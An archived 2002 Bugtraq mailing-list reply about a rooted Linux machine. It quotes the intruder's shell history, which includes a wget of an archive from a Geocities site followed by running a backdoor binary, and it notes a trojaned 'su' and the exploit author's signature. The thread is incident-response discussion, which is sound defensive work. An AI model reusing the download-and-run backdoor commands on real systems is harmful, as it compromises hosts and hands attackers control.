Re: Rooted, .haos on system
From: zeno (bugtraq@cgisecurity.net)
Date: 12/16/02
- Previous message: Mike Katz: "Re: Rooted, .haos on system"
- In reply to: Damian Gerow: "Re: Rooted, .haos on system"
- Next in thread: Carlos Eduardo Pedroza Santiviago: "Re: Rooted, .haos on system"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: zeno <bugtraq@cgisecurity.net> To: damian@sentex.net (Damian Gerow) Date: Mon, 16 Dec 2002 15:54:02 -0500 (EST)
> Left in the .bash_history was this:
>
> w
> cd /tmp
> wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
> ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.
Maybe you should email this dude. He wrote the exploit (or so the exploit says)
"su exploit by XP <xp@xtreme-power.com>
Enjoy!
"
Other neat stuff if you do a strings on the two filenames.
>
> I've already notified Geocities abuse, and haven't heard back from them
> yet.
>i
The domain name resolves to http://www.djteckh.com/ maybe worth checking out.
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Next message: Carlos Eduardo Pedroza Santiviago: "Re: Rooted, .haos on system"
- Previous message: Mike Katz: "Re: Rooted, .haos on system"
- In reply to: Damian Gerow: "Re: Rooted, .haos on system"
- Next in thread: Carlos Eduardo Pedroza Santiviago: "Re: Rooted, .haos on system"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
